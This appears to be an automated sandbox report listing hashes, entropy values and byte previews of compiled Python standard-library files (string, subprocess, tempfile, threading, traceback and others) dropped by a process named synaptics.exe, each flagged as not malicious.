                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7126
                                                                                                                                                                                                            Entropy (8bit):5.387788363750026
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:8LetNTT8nDlw15VntHYdo5H2vHA4yN/uZ1qkwto:zbTT8nhM5Vth5H2vHA4yN/G1qkwto
                                                                                                                                                                                                            MD5:26FAC96CD31154F71D0FD2B987680C84
                                                                                                                                                                                                            SHA1:5647EAB9AD8ABE49030E0FAF76A4A39B6A16DABA
                                                                                                                                                                                                            SHA-256:0743052B569B05D66104E94FD4AF93E2311F0831C2C72F26746B72466F65C223
                                                                                                                                                                                                            SHA-512:8B40684AFED52E57E4BA7D02CF74DC8E5948A494F4FD39C4FC519B95DC0C74158B6976B3E6148E966607A264E04C7CB476E800DDCD8BC1647E09B0DE5AF27785
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d^*.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e...Z.d.Z.e.d...d...Z.d.Z.d.Z.e.e...e...e...Z.d.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z.G.d.d...d...Z.e.......G.d.d...d...Z.d.S.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..Formatter..Template.....Nz. .....Z.abcdefg
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17099
                                                                                                                                                                                                            Entropy (8bit):5.696794420690984
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:QORubSi/2orlLbqOf9dzA3gfqtv+ScNDMI7BHMi+yDnuxb3rOyb5:QOkbSi+ors29JlqtvtcNoI7BHzxzra
                                                                                                                                                                                                            MD5:A5F06691191222D84ED211DF9585715A
                                                                                                                                                                                                            SHA1:D9DA097FEEC8A040A35B9A2B15A431837669F51B
                                                                                                                                                                                                            SHA-256:E9BEDB18630C8AD5C3DBC28A2E483DBF65C77F048D9B0B5B365747C9CED7D3CD
                                                                                                                                                                                                            SHA-512:05DA93CD5D9FB9225A037E13E0A5271145D70DFDF5261CA758DDF92C6C6579BAD57639EEBC2B9B1A692CF671B70E0BB2624B00516337B747BE2A1B7A56761B1A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.3.......................@...s....d.Z.d.d.l.m.Z...e.j.d.k.s.J...d.d...Z.e.g.d...e.e.d.d.........Z.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..i.d-d...d/d0..d1d2..d3d ..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\dM..d]dO..d^dQ..d_dS..d`dU..dadW..dbdY..dcd[..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtde..dudg..dvdi..dwdk..dxdm..dydo..dzdq..d{ds..d|d}..d~d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):331
                                                                                                                                                                                                            Entropy (8bit):5.139306927317733
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/CbextfvXhzYXcCuYKvg6FraMaVkoopngmIjZAuwkn23h/a8/Zkn:CCyxt35YXcaKvjFrDaVkoeKZApfs8/Zk
                                                                                                                                                                                                            MD5:304426169C0D8114CD1C227E67CF4CBA
                                                                                                                                                                                                            SHA1:9320A3348CC8CAA2089BEF2166C6E28A370A2861
                                                                                                                                                                                                            SHA-256:146D8FC65D5B6FA2CA65F5DC31B09292A4A2A4B4115C2268FD67D0191A5D47F4
                                                                                                                                                                                                            SHA-512:6B4CFA38BA66DD9A39298B203B8E87607F025F5573CC9540BB1715B091501FA74EB6491733376C07C506BBA57866184722563D99837833DF15A423FD79654686
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s,...g.d...Z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.).).Z.calcsize..packZ.pack_into..unpackZ.unpack_fromZ.iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__Z._structr....r......r....r.....5C:\Users\user\AppData\Local\xFSOj9El1Q\lib\struct.py..<module>....s............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44765
                                                                                                                                                                                                            Entropy (8bit):5.60949676945852
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ru0RXv9Df8N6wQVIGcx35LU1w2mDQkW4Oc+clEJn7Zk199DNSauyP4W3ggSegvc7:S0RXv5sjUeV0kzD+clEoSauLWeOQZcp
                                                                                                                                                                                                            MD5:039E478E9339127F51A71034A805631B
                                                                                                                                                                                                            SHA1:1C96ABB8743B5D4EFDF3F2C16E60411D1302AED6
                                                                                                                                                                                                            SHA-256:8FC25B60C498E8B1B3D71524DFF9471695F131BFE8AF8390C1B9B144ABF7A66F
                                                                                                                                                                                                            SHA-512:22487CDD5E34C141D48BA82868CBC5884D022B8E27ACF6F34FED30B76B5DD6D6FB0F9EEBC373173DF3F71A7363BEBD695109024F691E2BB2852A11A80492A6B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.S.......................@...sp...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.z.d.d.l.Z.W.n...e.yE......d.Z.Y.n.w.g.d...Z.z.d.d.l.Z.d.d.l.Z.d.Z.W.n...e.ym......d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.Y.n0w.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)..e..*g.d.......G.d.d...d.e+..Z,G.d.d...d.e,..Z-G.d.d...d.e,..Z.e.r.G.d.d...d...Z/G.d.d...d.e0..Z1n.e2e.d.d...Z3e4e.d...r.e.j5Z6n.e.j7Z6e.r.d.Z8d.d...Z9n.g.Z8d.d...Z9d.Z:d.Z;d.Z<d.d...Z=d.d...Z>d.d ..d!d"..Z?d#d$..Z@d.d ..d%d&..ZAG.d'd(..d(eB..ZCd.d.d.d.d)..d*d+..ZDd,d-..ZEd.d/..ZFd0d1..ZGd2d3..ZHeH..ZId.ZJG.d4d5..d5..ZKd.S.)6a....Subprocesses with accessible I/O streams..This module allows you to spawn processes, connect to their.input/output/error pipes, and obtain their return codes...For a complete description of this module see the Python documentation...Main API.========.run(...): Runs a command, waits for it to complete, then returns a.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24088
                                                                                                                                                                                                            Entropy (8bit):5.2824353507972965
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RGeOLQ/N1bmiY+HWkXkYibq1vElkl0kwgbdxXrzpRwJcNrxSejqX1uk:Ye881bminYBmvEKKkwovXbKMdTqX1uk
                                                                                                                                                                                                            MD5:702E3733389976256EFDC27BF455EDEA
                                                                                                                                                                                                            SHA1:6867AFA1D4E7113B7C8DD2F706116F785487E8FD
                                                                                                                                                                                                            SHA-256:11B1207A6A2DCA8B387AB8BF7BF35006B82C9DB0BE3F26344B8D32A7CBF15FE7
                                                                                                                                                                                                            SHA-512:047FA756EF008C855683C340AA58228AD20A159CACDFEDA4CFC7ACFE1A15B9E81513711C24EA023AF06726431A3643B12214D51DA19E3A550C42F30DFF727BE3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dku.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e.j.e.j.B.e.j.B.Z.e.e.d...rJe.e.j.O.Z.e.Z e.e.d...rVe e.j!O.Z e.e.d...r_e.j"Z"n.d.Z"d.Z#e...Z$d.d...Z%d.d...Z&d.d...Z'G.d.d...d...Z(d.d...Z)d.d...Z*d.a+d.d...Z,d.d...Z-d.d...Z.d.d...Z/d.a0d.d...Z1d d!..Z2d"d#..Z3d?d%d&..Z4d@d'd(..Z5d)e#d.f.d*d+..Z6G.d,d-..d-..Z7G.d.d/..d/..Z8.....2dAd.d3..d4d5..Z9e.j:d6k.s.e.j;d7k.r.e9Z<n.e.e.d8..a=......dBd.d3..d9d:..Z<G.d;d<..d<..Z>G.d=d>..d>..Z?d.S.)Ca....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race conditions.except for 'mktemp'. 'mktemp' is subject to race conditions and.should not be used; it is provided for backward compatibility only...The default path names are returned as str. If you supply bytes as.input, all return values will b
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13836
                                                                                                                                                                                                            Entropy (8bit):5.342272588669743
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:zB47doTOzzlFEYKRuPSzqjNGmwImkWf8FBQ:zB47d3F/5JNG5MkkBQ
                                                                                                                                                                                                            MD5:6E930B97EB61F6F435C3C54071A48561
                                                                                                                                                                                                            SHA1:6FDC4B95C89F2C5174DE15CD04931419181C9FC4
                                                                                                                                                                                                            SHA-256:4C69B35D7C5C8A75F6A950BE368B115614C2CEA3FE66563CA56D5741B83D0F5F
                                                                                                                                                                                                            SHA-512:ABEE24DB977230DF2B3C6068447008E86488934C7E85A9B62D6399F3C500285FFB278420F016D42D5197EDCD5CA0FE43C6E303F278A3339FFEF0853460CE0ABE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d*O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.e...d.e.j...Z.e...d.e.j...Z.d.d...Z.d.d.d...Z.e.d.k.rDe.e.d.......d.S.d.S.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c....................@...s....e.Z.d.Z.d.Z.i.Z.e.d...Z.e.D.].Z.e.e.e.e...<.q.d.Z.d.Z.d.e...e.....Z.d.e.d.d.......Z.e...d.e.e.e.e.d.....e.j...Z.[.[.[.e...d.e.....Z.[.e...d...Z.....................d&d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d.S.)'r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the default behaviour.. If you want to completely replace the main wrapping algorithm,. you'll probably have to override _wrap_chunks()... Several instance attributes control various aspects of wrapping:. width (default:
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13836
                                                                                                                                                                                                            Entropy (8bit):5.342272588669743
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:zB47doTOzzlFEYKRuPSzqjNGmwImkWf8FBQ:zB47d3F/5JNG5MkkBQ
                                                                                                                                                                                                            MD5:6E930B97EB61F6F435C3C54071A48561
                                                                                                                                                                                                            SHA1:6FDC4B95C89F2C5174DE15CD04931419181C9FC4
                                                                                                                                                                                                            SHA-256:4C69B35D7C5C8A75F6A950BE368B115614C2CEA3FE66563CA56D5741B83D0F5F
                                                                                                                                                                                                            SHA-512:ABEE24DB977230DF2B3C6068447008E86488934C7E85A9B62D6399F3C500285FFB278420F016D42D5197EDCD5CA0FE43C6E303F278A3339FFEF0853460CE0ABE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d*O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.e...d.e.j...Z.e...d.e.j...Z.d.d...Z.d.d.d...Z.e.d.k.rDe.e.d.......d.S.d.S.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c....................@...s....e.Z.d.Z.d.Z.i.Z.e.d...Z.e.D.].Z.e.e.e.e...<.q.d.Z.d.Z.d.e...e.....Z.d.e.d.d.......Z.e...d.e.e.e.e.d.....e.j...Z.[.[.[.e...d.e.....Z.[.e...d...Z.....................d&d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d.S.)'r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the default behaviour.. If you want to completely replace the main wrapping algorithm,. you'll probably have to override _wrap_chunks()... Several instance attributes control various aspects of wrapping:. width (default:
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44993
                                                                                                                                                                                                            Entropy (8bit):5.172998404427779
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:I1e/MIxOwAgbSGxwbNNo+rkPsXj16a1Zmi8Y2S41QrTrWOnO8F8+6LcAQJWBpSUW:IA/8Zf2lbPs/v612aOBy4kSUpx05izap
                                                                                                                                                                                                            MD5:20AE0E9E3C8999E2B5DFD03E06A7853E
                                                                                                                                                                                                            SHA1:44EE68F1C47FF28B57D7463F1CF67D0984E9F2DC
                                                                                                                                                                                                            SHA-256:CA3BC3D1D623863C1A1E3C4724C27369209D08CA3A089AD79D2D04E27F056E95
                                                                                                                                                                                                            SHA-512:7E8B8E862547FB27402AAEC2FA80AF29F4D8CBB8268DA1A540592BB1449331FA19BCF4DEC06EB132FFC98957D2C39D091883B6E3AB612E3F991A2CDC8BC7E186
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s6...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...z.d.d.l.m.Z...W.n...e.y=......d.d.l.m.Z...Y.n.w.g.d...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.z.e.j.Z.d.Z.e...d.....W.n...e ye......d.Z.Y.n.w.e.j!Z"z.e.j#Z$W.n...e yy......d.Z$Y.n.w.e.j%Z%[.d.a&d.a'd.d...Z(d.d...Z)d.d...Z*d.d...Z+e.Z,d.d...Z#G.d.d...d...Z-e-Z.G.d.d...d...Z/G.d.d...d...Z0G.d.d...d.e0..Z1G.d.d...d...Z2G.d.d ..d ..Z3G.d!d"..d"e4..Z5e.d#..j6Z7d$d%..Z8e#..a9i.Z:i.Z;e...Z<e...a=e>..a?d&d'..Z@G.d(d)..d)..ZAz.d.d*l.mBaCmDZE..W.n#..e...y.......d.d+lFmGZH..d.d,l.mIZI..eId-d...ZDd/d-..ZEd0d1..aCY.n.w.tCZJd2d3..ZKG.d4d5..d5eA..ZLG.d6d7..d7eA..ZMG.d8d9..d9eA..ZNd:d;..ZOd<d=..ZPd>d?..ZQd@dA..ZRdBdC..ZSdDdE..ZTg.ZUd.aVdFdG..ZWd.dHl.mXZX..eM..aYdIdJ..ZZdKdL..Z[z.d.dMl.m\Z]..W.n...e...y.......d.dNl^m]Z]..Y.n.w.dOdP..Z_e`e.dQ....r.e.jae_dR....d.S.d.S.)Sz;Thread module emulating a subset of Java's threading model......N)...monotonic)...WeakSet)...islice..count)...deque)...get_ident
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2762
                                                                                                                                                                                                            Entropy (8bit):5.781184922666707
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lNHWS58lFEOqIlPBJR41nDBzH3ch9C7Q7WnvKQvVgkGQLU:DHWSOFEOb5nIBb3ch9T6qKLU
                                                                                                                                                                                                            MD5:20661FAFA66B97A60C4572F2A9E07BAC
                                                                                                                                                                                                            SHA1:F25A9EB4A02D0D7C9B3A20021E201308AE3D7A05
                                                                                                                                                                                                            SHA-256:08574402FCAB23B3680A2373307C5C66C7061ACE83138275B6F18D44A79C8B69
                                                                                                                                                                                                            SHA-512:3BF4C1122E20D7362BA992FD597FAC0D7EBF6FCCD4744EA0216B22F49890D2AE4734EBAA54C59616A7E30FD12C5488D87FAFEC3166D4562D19686B4B6CB3BC7C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sF...d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDdE..eD...E..D...ZFe..GeF.H......i.dFe...dGe...dHe*..dIe...dJe+..dKe...dLe...dMe...dNe%..dOe0..dPe(..dQe...dRe&..dSe...dTe...dUe'..dVe5..i.dWe...dXe6..dYe...dZe1..d[e2..d\e)..d]e...d^e7..d_e...d`e...dae#..dbe...dce...dde...dee...dfe...dge ....e$e/e3e4e.e.e"e-e.e.e,e.e!dh....ZIdidj..ZJdkdl..ZKdmdn..ZLdoS.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF................................................................................................................................................................. ....!...."....#....$....%....&....'....(....)....*....+....,....-........./....0....1....2....3....4....5....6....7....8....9....:....;....<....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17218
                                                                                                                                                                                                            Entropy (8bit):5.78051163472385
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:mSAswuiCpcPm6mE93/w3CNgM/0n/JM7XHVOBnaH:mmiZPm3E93/wyNgM/EElOBnaH
                                                                                                                                                                                                            MD5:0209B4EA02BBE5A8B2CBBD850ADB35B3
                                                                                                                                                                                                            SHA1:C8415ADE9991E4DA7CCAA3A8FAE82451FE631529
                                                                                                                                                                                                            SHA-256:BCFD2AD06B0D5AC3A9A1038BBAA414DA535279A9D05547E190D7141DECCA6ED0
                                                                                                                                                                                                            SHA-512:65CDB54189CB501752B410A721173ADFFEFB8880069960F06D1AB42FDF3016407A664C9FB9D2E7D5CF114059F99F46103F8E6A4CFB25E32E43BD35B1C8640712
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.g.......................@...sT...d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...d.e.j...Z.e...d.e.j...Z.d.d.l.Z.e.j.g.d.....Z.[.G.d.d...d.e...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.e.e.d.e.......e.e.....Z.d.Z d.Z!d.Z"d.Z#d.Z$e.e!e"e#e$..Z%d.Z&e.d.d ..e.e&....Z'd!e&..Z(e.e'e(..Z)e.d"e)d#....Z*e.e*e)e%..Z+d$d%..Z,e.j-d&d'....Z.e.e,....Z/d(Z0d)Z1d*Z2d+Z3e.e/d,..e/d-....Z4e.e/d...e/d/....Z5e.e6e.j7e8e.d0d1......Z9e.d2e9..Z:e.e+e:e5e ..Z;e.e;..Z<e.e/d3..e.d4d.....e/d5..e.d6d.......Z=e.d7e.e4..Z>e.e.e>e+e:e=e ....Z?i.Z@e,..D.].ZAe0e@eAd4..<.e1e@eAd6..<.e2e@eAd,..<.e3e@eAd-..<...q.eB..ZCeB..ZDe,..D.]%ZEeEd6..eEd4..f.D.].ZFeC.GeF......qIeEd-..eEd,..f.D.].ZFeD.GeF......qZ..q?d8ZHG.d9d:..d:eI..ZJG.d;d<..d<eI..ZKG.d=d>..d>..ZLd?d@..ZMdAdB..ZNdCdD..ZOdEdF..Z.dGdH..ZPdIdJ..ZQdKdL..ZRdMdN..ZSeTdOk...r.eS....d.S.d.S.)Pao...Tokenization help for Python programs...tokenize(readline) is a generator that breaks a stream
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21732
                                                                                                                                                                                                            Entropy (8bit):5.296919422795521
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Too9MGsSgHvgJJpLbiO+pSbnwRG+SbL3JWFsFmppQigBsKU9l4UiTdBq:Too9jcHvIJpiJAngzSBhU9l4UiTdBq
                                                                                                                                                                                                            MD5:BF3E8753F779862BA0BCF29545B1E907
                                                                                                                                                                                                            SHA1:744BCE5598EA8AE605BF633B34ED293426D37581
                                                                                                                                                                                                            SHA-256:8EE2DDFDB65C43AC895D8EC2A7BB503690C997A3226964D0F34662E9A11B0AA2
                                                                                                                                                                                                            SHA-512:417F05436F868861BFA87B4946F78A974E292CC3F54734351B8C8C3EBF8F775A50567BE8A7B0BAC55976F4D5A3BBBA0BB4023D17B313A341BF952E21E8D35F3B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.i.......................@...sJ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d8d.d...Z.d.d...Z.d9d.d...Z.d8d.d...Z.d8d.d...Z.d.Z.d.Z.G.d.d...d...Z.e...Z.d.d...Z.e.e.d.d.d.f.d.d...Z.e.e.d.d.f.d.d...Z.e.f.d.d...Z.d.d...Z.d.d...Z.d:d.d ..Z.d;d!d"..Z.d:d#d$..Z.d<d%d&..Z.d9d'd(..Z.d9d)d*..Z.d+d,..Z.G.d-d...d...Z.d/d0..Z.d1d2..Z.d3Z.G.d4d5..d5e ..Z!G.d6d7..d7..Z"d.S.)=z@Extract, format and print information about Python stack traces......N)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc....................C...s4...|.d.u.r.t.j.}.t...|.......D.].}.t.|.|.d.d.....q.d.S.).zyPrint the list of tuples as returned by extract_tb() or. extract_stack() as a formatted stack trace to the given file.N......file..end)...sys..stderrr......from_list..format..print)...extracted_l
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9549
                                                                                                                                                                                                            Entropy (8bit):5.1495837346134135
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:x8BGSXkI30AX7ad5RV7VIPNmXkXFNlO8U2UuLWnxq3juXvypQ1SwDFBL0GSSSOS6:mBGgfLoV4NmAFyvWLwx8pOXU/I+rjmV
                                                                                                                                                                                                            MD5:AE0C4BBFE40F0B0BC8DC4717858F8073
                                                                                                                                                                                                            SHA1:82A1FE83DDBC3345A3970FA6279410D72E539D7A
                                                                                                                                                                                                            SHA-256:0E2E5749871E0A6940A509925268D813A0E9697FC2842FF24612794340AA2270
                                                                                                                                                                                                            SHA-512:5329765E6C3BAD10DA682197DE1440EB053A1F8989CB5CB7AC20D1F643AF48D83BBA9BE57D49EB4F3DC73DE6717F692F8DF815812DC18CFA1461191F09F454A0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.(.......................@...s....d.Z.d.d.l.Z.d.d...Z.e.e...Z.e.d.d.....Z.e.e.j...Z.e.e.j...Z.e.e.j...Z.d.d...Z.e.e.....Z.d.d...Z.e.e.....Z.d.d...Z.e...Z.e.e...Z.e.......d.d...Z.e...Z.e.e...Z.G.d.d...d...Z.e.e...j...Z.e.e...Z.e.g.j...Z.e.e.j...Z.e.e...j...Z e.e!j"..Z#e.e$j.d.....Z%e.e...Z&z.e'....e'y.......e..(..d...Z)e.e)..Z*e.e)j+..Z,d.Z)[)Y.n.w.e.e.j...Z-e.e.j...Z/[.[.[.[.[.[.d$d.d...Z0d.d...Z1d%d.d...Z2d.d...Z3G.d.d...d...Z4G.d.d...d...Z5d d!..Z6e.e7e8....Z9e.e8e!B...Z:e.e;..Z<e.d...Z=e.e>..Z?d"d#..e@..D...ZAd.S.)&zO.Define names for built-in types that aren't directly accessible as a builtin.......Nc....................C........d.S...N..r....r....r.....4C:\Users\user\AppData\Local\xFSOj9El1Q\lib\types.py.._f...........r....c....................C...r....r....r....r....r....r....r......<lambda>....r....r....c........................s....d.....f.d.d...}.|.j.d...S.).N.....c........................r....r....r....r........ar....r......f....r....z._cell_factory.<locals>.fr..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85301
                                                                                                                                                                                                            Entropy (8bit):5.275038230847264
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:+CitWnXfBkzWWZGNt2akuICUSA3yZS+Kug/kzVWqn1poHezYLXH1UXWbAyitL5U+:l6oWu5Gug8fAHeOVD8Vo+
                                                                                                                                                                                                            MD5:E05DDA2BF561D4DB121B86371F4EA76A
                                                                                                                                                                                                            SHA1:A1BEAA91D538241FE065B9F5BB19B5FCD8D18E62
                                                                                                                                                                                                            SHA-256:25CDF3A59131FA610FD852ED733017D1DA87E36F25C0DE69DF2AE2D273D1C6A3
                                                                                                                                                                                                            SHA-512:DEB4E73BE8392C26276AE6D27AB3F7D7384F5A9D9172D623298BA2147ED9C6BFE9A72D49F8C71F1BEB0B591752989AD4CA3D47C54CFB62D89542B87384F24AF7
                                                                                                                                                                                                            Malicious:false
